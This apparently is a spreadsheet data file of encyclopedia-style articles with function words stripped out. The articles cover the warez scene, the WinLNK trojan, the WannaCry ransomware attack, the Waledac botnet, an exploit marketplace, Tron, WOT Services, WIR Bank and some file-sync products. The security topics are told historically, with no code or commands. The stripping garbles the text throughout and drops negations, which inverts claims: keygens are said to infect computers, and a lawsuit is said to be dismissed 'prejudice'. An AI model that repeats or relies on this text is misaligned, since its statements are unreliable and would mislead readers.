considered serious problem people. 1992, software publishers association began battle phenomenon, promotional video "don't copy that floppy". business software alliance remained active anti-infringement organizations worldwide, although compensate extensive growth recent years, gained assistance recording industry association america (riaa), motion picture association america (mpaa), well american society composers, authors, publishers (ascap) broadcast music incorporated (bmi). today warez files distributed public bittorrent one-click hosting sites. some popular software companies targeted adobe, microsoft, nero, apple, dreamworks, autodesk, name few. reduce spread illegal copying, companies hired people release "fake" torrents (known torrent poisoning), look real meant downloaded, downloading individual realize company owns software received his/her address. they contact his/her isp, legal action taken company/isp. causes accelerated growth similar televisions telephones, computers become necessity every person information age. computers increased, software cyber crimes. mid-1990s, average internet user still dial-up, average speed ranging 28.8 33.6 kbit/s. wished download piece software, could download time could longer day, depending network traffic, internet service provider, server. around 1997, broadband began gain popularity greatly increased network speeds. "large-sized file transfer" problems became less severe, warez became widespread began affect large software files like animations movies. past, files distributed point-to-point technology: central uploader distributing files downloaders. with systems, large number downloaders popular file uses increasingly larger amount bandwidth. many downloads, server become unavailable. opposite true peer-to-peer networking; downloaders faster file distribution with swarming technology implemented file sharing systems like edonkey2000 bittorrent, downloaders help uploader picking uploading responsibilities. there many sites links one-click hosting websites sites upload files contribute growing amount warez. distribution compromised servers prior development modern peer-to-peer sharing systems home broadband service, sharing warez sometimes involved warez groups scanning internet weakly secured computer systems high-speed connections. these weakly secured systems would compromised exploiting poor security, creating special directory server unassuming name contain illegal content.a common mistake early administrators permit directory named /incoming allows full read write access external users, files /incoming hidden; creating directory inside /incoming, hidden directory would allow normal file viewing. users compromised site would directed location /incoming/data/warez find warez content. messages could left warez users uploading plain text file message inside.hackers would also known software bugs illicitly gain full administrative remote control computer, install hidden service host wares. this service usually running unusual port number, non-anonymous login name like "login: warez password: warez" help prevent discovery legitimate users; information compromised system would distributed select group people part warez scene.it important warez group members regulate access compromised servers, keep network bandwidth usage low. site suddenly became popular would noticed real owners equipment, business systems became slow disk space; investigation system usage would inevitably result discovery removal warez, tightening site security. automated warez distribution bots ability compromise attain full remote control business servers became developed, warez groups would hack server install compromised systems alongside service, would provide file sharing directly itself. this software would intelligently regulate access illicit data using file queues limit bandwidth usage, running off-hours overnight business owning compromised hardware closed day.in order advertise existence compromised site, software would join public warez channels post channel occasional status messages every minutes, providing information many people logged warez host, many files currently downloaded, upload/download ratio force users contributing data download), warez distributor running bot, status information.this functionality still exists still found warez channels, alternative modern streamlined distribution systems. opportunity find compromise poorly secured systems create illicit warez distribution site increased popular broadband service home users fully understand security implications home computer always turned connected internet types there generally distinction made different sub-types warez. unusual spellings shown commonly used directory names within compromised server, organize files rather thrown together single random collection. apps applications: generally retail version software package. cracks cracked applications: modified executable (usually one) and/or library (usually one) and/or patch designed turn trial version software package full version and/or bypass copy protections. video game add-ons: these include nocds, cracks, trainers, cheat codes etc. ebook e-books: these include unlicensed copies e-books, scanned books, scanned comics, etc. games video games: this scene concentrates computer based games, video game consoles, often released format disk image. hacks simplified/specific hacking tools: programs designed perform specific hacks click button, typically limited scope, aohell aol4free. keygens keygen software tools replicate registration/activation process genuine software product generate necessary keys activate software. movies movies: unauthorized copies movies, released still theaters cds/dvds/blu-ray prior actual retail date. mp3s audio: audio albums, singles, sources usually obtained ripping radio broadcast released compressed audio format mp3. mvids music videos ripped hdtv, dvds vcds. nocd, nodvd, fixedexe file modification allows installed program without inserting drive. game installed; required registry entry included .reg file. games ripped music and/or video files, video games, roms, thus decreasing size download. rips nothing ripped sometimes referred (direct play). portables portable applications: similar rips, case they're software applications instead video games. point portable software fact placed removable media place local hard drive) need installing; usually compressed executable file, using software like vmware thinapp molebox. scripts scripts: these include unlicensed copies commercial scripts (such vbulletin, invision power board, etc.) coded companies php, asp, languages. subs subtitles: integrated tv-rip movie. serials refers collection product keys serial numbers made available purpose activating trial software, without payment. templates templates: these include leaked commercial website templates coded companies. tv-rips television programs: television shows movies, usually commercials edited out. commonly released within hours airing. rips television series fall sub-type. pornography: these imagesets, paysite videos retail movies. zero-day 0-day copyrighted work released original product, sometimes even before. considered mark skill among warez distribution groups crack distribute program commercial release. movie infringement movie copyright infringement looked upon impossible major studios. when dial-up common early mid-1990s, movies distributed internet tended small. technique usually used make small compression software, thus lowering video quality significantly. time, largest copyright violation threat software. however, along rise broadband internet connections beginning around 1998, higher quality movies began widespread distribution release decss, images copied directly original dvds slowly becoming feasible distribution method. today, movie sharing become common caused major concern amongst movie studios representative organizations. because mpaa often running campaigns movie trailers tries discourage people copying material without permission. unlike music industry, online music stores available several years, movie industry moved online distribution 2006, launch amazon unbox. because this, cameras sometimes forbidden movie theaters. file formats software release contain megabytes data, presented challenges sending internet, particularly late 1990s broadband unavailable home consumers. these challenges apply even greater extent single-layer release, contain data. warez scene made standard practice split releases many separate pieces, called disks, using several file compression formats: (historical tar, lzh, ace, uha, arj), zip, commonly rar. original purpose "disks" .rar file could single 1.44 inch floppy disk. with growing size games, longer feasible, hundreds disks would need used. average size disks released groups today megabytes megabytes, however common find disks megabytes. this method many advantages sending single large file: two-layer compression could sometimes achieve almost tenfold improvement original dvd/cd image. overall file size lessens transfer time bandwidth required. problem file transfer data corrupted, necessary resend corrupted files instead resending entire large file. this method also allows possibility downloading separate ‘disks’ different sources, early attempt modern segmented downloading. case one-click hosting websites, downloading multiple files several sources significantly increase download speeds. this even source(s) provides slow download speeds individual disks, downloading several disks simultaneously allow user achieve much greater download rates.despite fact many modern programs support segmented downloading, compression rar, zip, breaking files changed. releases software titles often come forms. full form full version game application, generally released dvd-writable disk images (bin files). cut-down version title additions included legitimate dvd/cd (generally manuals, help files, tutorials, audio/video media) omitted. game rip, generally game video removed, audio compressed vorbis, must decoded original form playing. these rips rare today, modern broadband connections easily handle full files, audio usually already compressed original producer fashion. warez malware there common perception warez sites represent high risk terms malware. addition, several papers showing indeed correlation warez/file sharing sites malware. particular, study shows domains study classified pirate, 7.1% infected (while random domains 0.4% infected); another study maintains '"maliciousness" content sites classified pirate (which specifically included warez sites) highest among researched site categories. domains related anti-copy protection tools among malicious sites. another study specifically targeted anti-copy protection tools cracks generators. they conclude majority programs infect user's computer types malware. chance end-user exposed malicious code dealing cracked applications games 50%.these statistical data questionable though, prominent antivirus software programs tend classify keygens viruses priori, although keygens infect users' computers way.infected warez directly warez scene hand, unusual occurrence. malicious content usually added later stage third parties. demographics warez traders share many similarities hackers crackers. primary warez distribution groups include single cracker renders copy protected technologies warez inoperable. unlike typical hacker cracker, general demographics warez trader older married professionals. need attention another similarity groups well belief digital property free. also references further reading chandra, priyank (2016). "order warez scene: explaining underground virtual community framework". proceedings 2016 conference human factors computing systems. '16. york, association computing machinery (acm) (may): 372–383. doi:10.1145/2858036.2858341. isbn 9781450333627. s2cid 15919355. retrieved august 2016. eve, martin paul (2021). warez infrastructure aesthetics piracy. brooklyn, isbn 978-1-68571-036-1. goldman, eric (2004). "warez trading criminal copyright infringement". journal copyright society u.s.a. (2): 395–436, esp. 427. ssrn 487163. also, goldman, eric (2004-01-07), "warez trading criminal copyright infringement," working paper, [4]. goldman, eric (2005), "the challenges regulating warez trading," social science computer review, vol. [5]. rehn, (2004). "the politics contraband: honor economies warez scene". journal socio-economics. july): 359–374. doi:10.1016/j.socec.2003.12.027. s2cid 46154259. rosokoff, jacqueline (2012-02-02). "the rules digital music services must follow" (blogpost). tunecore. brooklyn, tunecore, inc. retrieved august 2016. schwabach, aaron (2014). internet law: technology, society, compromises. ebsco ebook academic collection (2nd, revised ed.). santa barbara, abc-clio. 247f, passim. isbn 978-1610693509. retrieved august 2016. earlier edition schwabach, (2006). internet law…. abc-clio's contemporary world issues. 307–309, passim. isbn 978-1851097319., publisher access date. witt, stephen (2015). music free: industry, turn century, patient zero piracy. london: penguin. 71f, 88f. 105ff, 139ff, 161ff, 183, 217, 226, 268ff, passim. isbn 978-0698152526. retrieved august 2016. external links 2600 guide piracy article warez scene (ascii plaintext image scans 2600: hacker quarterly) "the shadow internet" article modern warez "top sites" wired news. darknet future content distribution global piracy study 2005 (pdf) global piracy study 2004 (pdf) ordered misbehavior structuring illegal endeavor rehn. study illegal subculture known "warez scene". (pdf) piracy textfiles historical collection documents released warez-related individuals. warez trading criminal copyright infringement article warez trading law, including recap prosecutions electronic theft act.</t>
  </si>
  <si>
    <t>Trojan.WinLNK.Agent</t>
  </si>
  <si>
    <t>trojan.winlnk.agent (also trojan:win32/startpage.os) definition kaspersky labs trojan downloader, trojan dropper, trojan spy. first known detection goes back 2011, according microsoft malware protection center. this trojanware opens internet explorer browser predefined page (like i.163vv.com/?96). trojan files extension (expression) windows shortcut malicious file, program, folder. file family launches malicious executable dropped malware. these files mostly used worms spread drives (i.e.). other aliases win32/startpage.nzq (eset) trojan.winlnk.startpage (kaspersky labs) trojan:win32/startpage.os (microsoft) other variants trojan.winlnk.agent.ae trojan.winlnk.agent.ew statistics 2016, india incidents relating trojan 18,36 worldwide. external links analysis file virustotal references</t>
  </si>
  <si>
    <t>WannaCry ransomware attack</t>
  </si>
  <si>
    <t>wannacry ransomware attack worldwide cyberattack 2017 wannacry ransomware cryptoworm, targeted computers running microsoft windows operating system encrypting data demanding ransom payments bitcoin cryptocurrency. propagated eternalblue, exploit developed united states national security agency (nsa) older windows systems. eternalblue stolen leaked group called shadow brokers month prior attack. while microsoft released patches previously close exploit, much wannacry's spread organizations applied these, using older windows systems past end-of-life. these patches imperative organizations' cyber security many implemented ignorance importance. some claimed need 24/7 operation, aversion risking formerly working applications breaking patch changes, lack personnel time install them, reasons. attack began 07:44 2017 halted hours later 15:03 registration kill switch discovered marcus hutchins. kill switch prevented already infected computers encrypted spreading wannacry. attack estimated affected 200,000 computers across countries, total damages ranging hundreds millions billions dollars. security experts believed preliminary evaluation worm attack originated north korea agencies working country. december 2017, united states united kingdom formally asserted north korea behind attack.a variant wannacry forced taiwan semiconductor manufacturing company (tsmc) temporarily shut several chip-fabrication factories august 2018. virus spread 10,000 machines tsmc's advanced facilities. description wannacry ransomware cryptoworm, targeted computers running microsoft windows operating system encrypting (locking) data demanding ransom payments bitcoin cryptocurrency. worm also known wannacrypt, wana decrypt0r 2.0, wanacrypt0r 2.0, wanna decryptor. considered network worm also includes transport mechanism automatically spread itself. this transport code scans vulnerable systems, uses eternalblue exploit gain access, doublepulsar tool install execute copy itself. wannacry versions created using microsoft visual 6.0.eternalblue exploit microsoft's implementation server message block (smb) protocol released shadow brokers. much attention comment around event occasioned fact u.s. national security agency (nsa) (from exploit likely stolen) already discovered vulnerability, used create exploit offensive work, rather report microsoft. microsoft eventually discovered vulnerability, tuesday, march 2017, issued security bulletin ms17-010, detailed flaw announced patches released windows versions currently supported time, windows vista, windows windows 8.1, windows windows server 2008, windows server 2008 windows server 2012, windows server 2016.doublepulsar backdoor tool, also released shadow brokers april 2017. starting april 2017, security researchers reported tens thousands computers doublepulsar backdoor installed. april, reports estimated number infected computers could several hundred thousand, numbers increasing every day. wannacry code take advantage existing doublepulsar infection, installs itself. 2017, private cybersecurity company risksense released code github stated purpose allowing legal white penetration testers test cve-2017-0144 exploit unpatched systems.when executed, wannacry malware first checks kill switch domain name; found, ransomware encrypts computer's data, attempts exploit vulnerability spread random computers internet, laterally computers network. modern ransomware, payload displays message informing user files encrypted, demands payment around us$300 bitcoin within three days, us$600 within seven days, warning "you enough time. [sic]" three hardcoded bitcoin addresses, wallets, used receive payments victims. wallets, transactions balances publicly accessible even though cryptocurrency wallet owners remain unknown.several organizations released detailed technical write-ups malware, including senior security analyst risksense, microsoft, cisco, malwarebytes, symantec mcafee. attack attack began friday, 2017, evidence pointing initial infection asia 07:44 utc. initial infection likely exposed vulnerable port, rather email phishing initially assumed. within code reported infected 230,000 computers countries.organizations installed microsoft's security update march affected attack. those still running unsupported versions microsoft windows, windows windows server 2003 particularly high risk security patches released since 2014 windows july 2015 windows server 2003. kaspersky study reported, however, less percent affected computers running windows percent affected computers running windows controlled testing environment, cybersecurity firm kryptos logic found unable infect windows system wannacry using exploits, payload failed load, caused operating system crash rather actually execute encrypt files. however, executed manually, wannacry could still operate windows defensive response experts quickly advised affected users paying ransom reports people getting data back payment high revenues would encourage campaigns. june 2017, attack subsided, total payments totaling us$130,634.77 (51.62396539 xbt) transferred.the initial attack may, microsoft released out-of-band security updates life products windows windows server 2003 windows patches created february year following vulnerability january year. organizations advised patch windows plug vulnerability order protect cyber attack. head microsoft's cyber defense operations center, adrienne hall, said "due elevated risk destructive cyber-attacks time, made decision take action applying updates provides protection potential attacks characteristics similar wannacrypt [alternative name wannacry]".researcher marcus hutchins discovered kill switch domain hardcoded malware. registering domain name sinkhole stopped attack spreading worm, ransomware encrypted computer's files unable connect domain, computers infected wannacry website's registration unable while help already infected systems, severely slowed spread initial infection gave time defensive measures deployed worldwide, particularly north america asia, attacked extent elsewhere. may, first variant wannacry appeared second kill-switch registered matt suiche day. this followed second variant third last kill-switch may, registered check point threat intelligence analysts. days later, version wannacry detected lacked kill switch altogether.on may, reported hackers trying mirai botnet variant effect distributed denial-of-service attack wannacry's kill-switch domain intention knocking offline. may, hutchins protected domain switching cached version site, capable dealing much higher traffic loads live site.separately, researchers university college london boston university reported paybreak system could defeat wannacry several families ransomware recovering keys used encrypt user's data.it discovered windows encryption apis used wannacry completely clear prime numbers used generate payload's private keys memory, making potentially possible retrieve required overwritten cleared resident memory. kept memory wannacry process killed computer rebooted infected. this behaviour used french researcher develop tool known wannakey, automates process windows systems. this approach iterated upon second tool known wanakiwi, tested work windows server 2008 well.within four days initial outbreak, infections slowed trickle responses. attribution linguistic analysis ransom notes indicated authors likely fluent chinese proficient english, versions notes languages probably human-written rest seemed machine-translated. according analysis fbi's cyber behavioral analysis center, computer created ransomware language files hangul language fonts installed, evidenced presence "\fcharset129" rich text format tag. metadata language files also indicated computers created ransomware utc+09:00, used korea.a security researcher initially posted tweet referencing code similarities wannacry previous malware. cybersecurity companies kaspersky symantec said code similarities previously used lazarus group (believed carried cyberattack sony pictures 2014 bangladesh bank heist 2016—and linked north korea). this could also either simple re-use code another group attempt shift blame—as cyber false flag operation; leaked internal memo alleged also linked creation worm north korea. brad smith, president microsoft, said believed north korea originator wannacry attack, uk's national cyber security centre reached conclusion.on december 2017, united states government formally announced publicly considers north korea main culprit behind wannacry attack. then-president trump's homeland security advisor, bossert, wrote op-ed wall street journal charge, saying make allegation lightly. based evidence." press conference following day, bossert said evidence indicates jong-un given order launch malware attack. bossert said canada, zealand japan agree united states' assessment evidence links attack north korea, united kingdom's foreign commonwealth office says also stands behind united states' assertion.north korea, however, denied responsible cyberattack.on september 2018, department justice (doj) announced formal charges park jin-hyok involvement sony pictures hack 2014. contended park north korean hacker working part team experts north korean reconnaissance general bureau. department justice asserted team also involved wannacry attack, among activities. impact ransomware campaign unprecedented scale according europol, estimates around 200,000 computers infected across countries. according kaspersky lab, four affected countries russia, ukraine, india taiwan.one largest agencies struck attack national health service hospitals england scotland, 70,000 devices including computers, scanners, blood-storage refrigerators theatre equipment affected. may, services turn away non-critical emergencies, ambulances diverted. 2016, thousands computers separate trusts england reported still running windows 2018 report members parliament concluded hospitals organizations checked wake wannacry attack still failed cybersecurity checks. hospitals wales northern ireland unaffected attack.nissan motor manufacturing tyne wear, england, halted production ransomware infected systems. renault also stopped production several sites attempt stop spread ransomware. spain's telefónica, fedex deutsche bahn hit, along many countries companies worldwide.the attack's impact said relatively compared potential attacks type could much worse hutchins discovered kill switch built creators specifically targeted highly critical infrastructure, like nuclear power plants, dams railway systems.according cyber-risk-modeling firm cyence, economic losses cyber attack could reach us$4 billion, groups estimating losses hundreds millions. affected organizations following alphabetical list organisations confirmed affected: reactions number experts highlighted nsa's non-disclosure underlying vulnerability, loss control eternalblue attack tool exploited edward snowden said "privately disclosed flaw used attack hospitals found lost attack happened". british cybersecurity expert graham cluley also sees "some culpability part u.s. intelligence services". according others "they could done something ages problem fixed, it". also said despite obvious uses tools people interest, duty protect countries' citizens. others also commented attack shows practice intelligence agencies stockpile exploits offensive purposes rather disclosing defensive purposes problematic. microsoft president chief legal officer brad smith wrote, "repeatedly, exploits hands governments leaked public domain caused widespread damage. equivalent scenario conventional weapons would u.s. military tomahawk missiles stolen." russian president vladimir putin placed responsibility attack u.s. intelligence services, created eternalblue.on 2017, united states bipartisan lawmakers introduced patch aims exploits reviewed independent board "balance need disclose vulnerabilities national security interests increasing transparency accountability maintain public trust process".on june 2017, united states congress hold hearing attack. subpanels house science committee hear testimonies various individuals working government non-governmental sector improve protection mechanisms systems similar attacks future.marcus hutchins, cybersecurity researcher, working loose collaboration uk's national cyber security centre, researched malware discovered "kill switch". later globally dispersed security researchers collaborated online develop open source tools allow decryption without payment circumstances. snowden states "nsa-enabled ransomware eats internet, help comes researchers, agencies" asks case.adam segal, director digital cyberspace policy program council foreign relations, stated "the patching updating systems broken, basically, private sector government agencies". addition, segal said governments' apparent inability secure vulnerabilities "opens questions backdoors access encryption government argues needs private sector security". arne schönbohm, president germany's federal office information security (bsi), stated "the current attacks show vulnerable digital society it's wake-up call companies finally take security [seriously]". united kingdom effects attack also political implications; united kingdom, impact national health service quickly became political, claims effects exacerbated government underfunding nhs; particular, ceased paid custom support arrangement continue receiving support unsupported microsoft software used within organization, including windows home secretary amber rudd refused whether patient data backed shadow health secretary ashworth accused health secretary jeremy hunt refusing critical note microsoft, national cyber security centre (ncsc) national crime agency received months previously.others argued hardware software vendors often fail account future security flaws, selling systems technical design market incentives eventually able properly receive apply patches.the denied still using claiming 4.7% devices within organization windows cost attack estimated million disruption services upgrades.after attack, digital refused finance estimated billion meet cyber essentials plus standard, information security certification organized ncsc, saying would constitute "value money", invested million planned spend £150 [million] next years" address cyber security weaknesses. also references external links ransom:win32/wannacrypt microsoft malware protection center @actual_ransom twitter, twitterbot tracking ransom payments</t>
  </si>
  <si>
    <t>Waledac botnet</t>
  </si>
  <si>
    <t>waledac, also known aliases waled waledpak, botnet mostly involved e-mail spam malware. march 2010 botnet taken microsoft. operations before eventual takedown, waledac botnet consisted estimated 70,000–90,000 computers infected "waledac" computer worm. botnet capable sending billion spam messages day, total global spam volume.on february 2010, microsoft court order resulted temporary cut-off domain names used command control servers botnet, effectively crippling large part botnet. however, besides operating command control servers waledac worm also capable operating peer-to-peer communication various botnet nodes, means extent damage difficult measure. codenamed 'operation b49', investigation conducted months thereby yielded 'zombie' computers. more million 'zombie' computers brought garrison hackers still infected.in early september 2010, microsoft granted ownership domains used waledac broadcast spam email. also botnet internet crime internet security command control (malware) zombie (computer science) references external links technical analysis waledac worm infamous waledac botnet picture not? techrepublic.com archive.today (archived 2013-01-02)</t>
  </si>
  <si>
    <t>WabiSabiLabi</t>
  </si>
  <si>
    <t>wabisabilabi wslabi online marketplace selling computer exploits auction format. company claimed security researchers disclosed vulnerabilities software vendors would fairly compensated work selling trusted platform. however, year opening marketplace, company considering shutting lack paying customers. company considering moving subscription service adequately compensate security researchers. customers purchased exploits included companies verisign 3com. founded july 2007, cofounder arrested spying charges november year. also therealdeal references external links archived page wares sale</t>
  </si>
  <si>
    <t>Tron (cryptocurrency)</t>
  </si>
  <si>
    <t>tron decentralized, open-source blockchain-based operating system smart contract functionality, proof-of-stake principles consensus algorithm cryptocurrency native system, known tronix (trx). established march 2014 justin since 2017 overseen supervised tron foundation, non-profit organization singapore, established year. originally ethereum-based erc-20 token, switched protocol blockchain 2018. history tron founded justin 2017. tron foundation established july 2017 singapore. tron foundation raised million 2017 initial coin offering shortly china outlawed digital tokens. testnet, blockchain explorer, wallet launched march 2018. tron mainnet launched shortly afterward 2018, marking odyssey release technical milestone tron. june 2018, tron switched protocol erc-20 token ethereum independent peer-to-peer network. july 2018, tron foundation announced finished acquisition bittorrent, peer-to-peer file sharing service. with this, tron declared independence creation genesis block, along july 2018 acquisition bittorrent. upon acquisition, august 2018, bittorrent founder bram cohen also disclosed leaving company found chia, alternative bitcoin created less energy-intensive cryptocurrency.by january 2019, tron total market $1.6 billion. despite market performance, authors viewed tron typical case complex disordered nature cryptocurrencies. february 2019, acquired tron foundation, bittorrent started token sale based tron network. architecture tron adopts 3-layer architecture divided storage layer, core layer, application layer. tron protocol adheres google protocol buffers, intrinsically supports multi-language extension.the tron protocol, maintained primarily tron foundation, distributes computing resources equally among holders internal pricing mechanisms bandwidth energy. tron provides decentralized virtual machine, execute program using international network public nodes. network zero transaction fees conducts approximately 2,000 transactions second.the implementations tron require minimal transaction fees order prevent malicious users performing ddos attacks free. respect, eos.io tron quite similar, negligible fees, high transactions second, high reliability, regarded generation blockchain systems. michael borkowski, marten sigwart, philipp frauenthaler, taneli hukkinen stefan schulte defined tron ethereum clone, fundamental differences. transactions second rate tron's blockchain questioned theoretical claim. criticisms january 2018, tweet, juan benet, protocol labs, revealed white paper tron copied portions white papers ipfsbot minefilecoin, without single reference. text tron white paper copied word-for-word, actual vocabulary, content structure paper looked similar documents prepared protocol labs. researchers digital asset research (dar) discovered multiple instances code copied projects tron code base. also accused violating lesser general public license v3.0 (lgpl) project mention client derived ethereumj, java implementation ethereum. these accusations denied tron foundation, organization behind design system.in 2019, cyber-security testing service hackerone revealed computer could brought tron's entire blockchain halt. revelation showed barrage requests sent single could used squeeze power blockchain's cpu, overload memory, perform distributed denial-of-service (ddos) attack.on june 2022, tron's algorithmic stablecoin, usdd, lost dollar. references external links official website</t>
  </si>
  <si>
    <t>WOT Services</t>
  </si>
  <si>
    <t>services developer mywot (also known trust), online reputation internet safety service shows indicators trust existing websites. confidence level based user ratings third-party malware, phishing, scam spam blacklists. service also provides crowdsourced reviews, extent websites trustworthy, respect user privacy, vendor reliability child safety.a 2016 norddeutscher rundfunk investigation revealed services sold user activity data collected apps browser extensions third parties violation privacy policies stores software distributed. history services founded 2006 sami tolvanen timo ala-kleemola, wrote mywot software post-graduates tampere university technology finland. they launched service officially 2007, suurio ceo. suurio replaced november 2009, founders left company 2014.in 2009, mysql founder michael widenius invested services became member board directors. services longer portfolio company widenius's venture capital firm, openocean.vc. february 2016, services changed name software.wot services partnerships mail.ru, facebook, hphosts, legitscript, panda security, phishtank, globalsign truste.by november 2013, services million downloads.wot services made money collecting browsing history data users selling usage data; said anonymized data selling sale user-related data november 2016, german state media investigation found services secretly collected personal user details sold licensed information unidentified third-party businesses entities data monetization purposes. this activity breached privacy rules guidelines several browsers. result, browser add-on involuntarily removed mozilla firefox's add-on store, voluntarily removed browsers' add-on/extension stores. eventually reinstated. november 2016, german public broadcasting station reported results investigation in-house journalists, showing collected, recorded, analyzed sold user-related data third parties. data obtained traceable could assigned specific individuals, despite wot's claim user data anonymized. investigative journalism report based freely available sample data, revealed sensitive private information users could retrieved. information included websites visited, account names email addresses, potentially revealing user illnesses, sexual preferences drug consumption. journalists also reconstructed media company's confidential revenue data, details ongoing police investigation.german media contacted services results investigation prior publication report. declined comment findings.a days news story aired, mozilla removed browser add-on firefox add-on store. subsequently removed browsing tool browsers, including chrome opera. "mobile security protection" mobile removed google play, approximately week extension removed google chrome extension store. blog post published december 2016, services stated upgraded browser extension, released google chrome extension gallery. upgraded version included "several major code updates order protect users privacy opt-out option user settings, users wish share data still want easy access wot." february 2017, mozilla reinstated mywot browsing tool firefox add-on store. mywot addon services offers add-on browsers including firefox, google chrome, opera, internet explorer baidu. extension rates websites based reputation score provides users red, yellow, green indicator, meaning site poor reputation score. reviews discovered selling personally identifiable user data november 2016. this breach user privacy, initially discovered reported investigative journalists germany, widely reported press, resulting removal trust plugin major browsers.in years prior discovery privacy breach, press reviews positive. york times washington post wrote wot—the 2010 post 2008 2011.pc world's preston gralla rick broida recommended 2009 2010 respectively. magazine's neil rubenking concluded: "web trust's protection free, impact browsing speed; well worth trying out". however, minus side, found several clearly adult sites unrated wished would also rate sponsored search results, like major competitors.in 2013, softpedia reviewer ionut ilascu wrote: "the reliability service grown past years, despite voices accusing exactly opposite proof collaboration facebook, opera mail.ru group", concluding: service, (web trust) viewed biased, latest developments balancing user opinion order provide relevant information point contrary." lawsuits february 2011, lawsuit florida (united states) filed forum members, demanding remove certain website ratings associated comments cautioning phishing scams. court ordered case dismissed prejudice (the equivalent verdict guilty law). germany, preliminary injunctions issued courts, delete feedback. also mcafee siteadvisor netcraft norton safe website reputation ratings google safesearch references</t>
  </si>
  <si>
    <t>WIR Bank</t>
  </si>
  <si>
    <t>bank, formerly swiss economic circle (german: wirtschaftsring-genossenschaft), wir, independent complementary currency system switzerland serves businesses hospitality, construction, manufacturing, retail professional services. issues manages private currency, called franc, used combination swiss franc generate dual-currency transactions. system franc electronic currency reflected clients' trade accounts paper money. intentions starting increased sales, cash flow profits qualified participant. created credit system issues credit, francs, members. credit lines secured members pledging assets ensures currency asset-backed. when members enter transaction swiss francs francs reduces amount cash needed buyer; seller discount product service. history founded 1934 businessmen werner zimmermann paul result currency shortages global financial instability. banking license granted 1936. both zimmermann influenced german georgist economist silvio gesell; however, bank renounced gesell's "free money" theory 1952, opening door monetary interest."wir" abbreviation wirtschaftsring word "we" german, reminding participants economic circle also community. according cooperative's statutes, "its purpose encourage participating members buying power other's disposal keep circulating within ranks, thereby providing members additional sales volume." initially keeping gesell's "free money" doctrine, economic circle circulated certificates negative monthly interest rates enforced required monthly stamp reverse side certificates. this feature, called demurrage aimed preventing hoarding avoiding constant devaluation currency. this practice eventually ended 1948.although started sixteen members, today grown include 62,000. total assets approximately billion chf, annual sales range billion, 2005. 1998, assets held credit system million liabilities million, i.e. circulating money, equity system million. these obligations interest free cost zero. income interest credit clearing activities million francs. currency code designated 4217. bank not-for-profit entity, although status changed bank's expansion. bank considers stable, claiming fully operational times general economic crisis dampen downturns business cycle, helping stabilize swiss economy difficult times. cited example documentary film tomorrow (demain) (2015). also members bank part wir's inspiration. references external links official website report erick hansch, 1971 bank video report giorgio simonetti, television [italian] eine währung, tausch erfindet german) essay james stodder bernard lietaer. published welt commons muster gemeinsamen handelns, transcript-verlag, germany, 205.</t>
  </si>
  <si>
    <t>Syncdocs</t>
  </si>
  <si>
    <t>syncdocs backup file synchronization software google drive. syncdocs uses cloud computing enable users back synchronize windows computer files google documents google drive accounts. features full data migration google drive cloud. program supports editing local microsoft office documents online using google docs. windows folder structure replicated online. ability sync network folders external drives google drive. accounts synced google drive concurrently. synchronization file folder changes contacts google local computers. compression support. end-to-end google drive encryption using advanced encryption standard file versioning unicode filename support. file sharing drive mapping google drive local drive letter.the google drive client shares basic features syncdocs. main differences syncdocs ability sync multiple google accounts concurrently syncdocs ability sync folders network. however, syncdocs android client, google drive does. also file synchronization comparison file synchronization software backup list backup software dropbox gdocsdrive google drive references external links http://www.syncdocs.com</t>
  </si>
  <si>
    <t>Wasabi Technologies</t>
  </si>
  <si>
    <t>wasabi technologies, inc. object storage service provider based united states sells product, object storage service called wasabi cloud storage. company co-founded september 2015 david friend jeff flowers launched cloud storage product 2017.friend, company, claims software "manages data center hardware stores organizes information," resulting high-speed reading writing data. history friend flowers previously co-founders carbonite, online backup service, among companies. company initially called "bluearchive" founding, later renamed "wasabi technologies, inc." japanese horseradish.wasabi technologies, inc. launched single data center location ashburn, virginia, limitation generated concern online tech forum, hacker news.on january 2018, frost sullivan gave wasabi technologies, inc, 2017 north american technology innovation award.on march 2018, company announced satellite-based cloud storage system, collaborating spacebelt satellites data centers.on june 2018, chris fenton (former president general manager entertainment) joined advisory board. wasabi also launched data center hillsboro, oregon.in october 2018, company announced plans open first european data center netherlands.on march 2019, company announced third data center, first located europe, opened amsterdam, netherlands.on april 2nd, 2019, wasabi launched partner network, volume-based incentive program.in september 2019, wasabi technologies announced received investment undisclosed amount docomo ventures. companies also made joint announcement availability wasabi cloud storage part enterprise cloud service, became available emea apac regions. october 2019, company announced launch fourth data center virginia.on november 4th, 2021, wasabi technologies signed sponsor fenway bowl. march 2022, company signed multi-year deal boston bruins garden became official cloud storage partner. june year also secured naming rights nesn studio fenway park. funding september 2018: wasabi technologies, inc. raised million october 2019: wasabi technologies, inc. received investment undisclosed amount docomo ventures. 2020: wasabi technologies, inc. raised million references external links official website</t>
  </si>
  <si>
    <t>SyncToy</t>
  </si>
  <si>
    <t>synctoy freeware tool microsoft's powertoys series provided easy-to-use graphical user interface synchronizing files folders windows versions vista, written using microsoft's .net framework used microsoft sync framework. features users initially need create "folder pair" represents folders ("left" "right" folders) compared synchronized. these folders local drive, external device flash drive, network share another computer. synctoy supports paths. provides browse option find folder network share, users type directly. synctoy offers safeguards ensure user lose files permanently deemed unnecessary sync. firstly, user preview going happen sync takes place, without actually changing anything; secondly, deleted files optionally moved recycle bin. synctoy defines three different types operation synchronize folders: synchronize takes folders makes sure exactly files. this, synctoy copy files either direction delete rename files either folder. case file updated left right folders, version later modification date considered winner. version overwritten (but recovered recycle one's settings specify deletions recycle bin). echo looks changes (file modifications, files, renames, deletes) left folder makes right folder match left folder every way. contribute like echo, delete files.synctoy supports 32-bit 64-bit versions windows windows vista, windows history synctoy started powertoy windows initially releases took version numbers 1.x, culminating version 1.4. these versions written microsoft's .net framework contained code folder synchronization. they included actions present version, plus additional actions (labelled subscribe combine): subscribe would update file left folder also exists right folder found older. files would copied, existing files updated, needed. combine similar synchronize except files would deleted pairs. file side out-of-date renamed newer file copied, updated copy older version retained folder. file deleted either paired folders deleted folder. only copy (and rename) operations occur.in november 2008 version released. this rewritten version built microsoft sync framework. compared version included better support unattended synchronization runs, compatibility, support synchronizing encrypted files, file folder exclusion based names file types, renaming folder pairs detection drive letter reassignment. synctoy released november 2009, includes several minor enhancements fixes several bugs, including serious issue data would corrupted, another deletes would synchronized echo mode. version last version available official download discontinued january 2021. also file synchronization list file copying software comparison file synchronization software related microsoft software: robocopy windows briefcase onedrive (previously skydrive, windows live skydrive windows live folders) windows live mesh, superseded onedrive windows live sync, superseded onedrive references external links synctoy scheduling article schedule synctoy automatically repetitively.</t>
  </si>
  <si>
    <t>Web skimming</t>
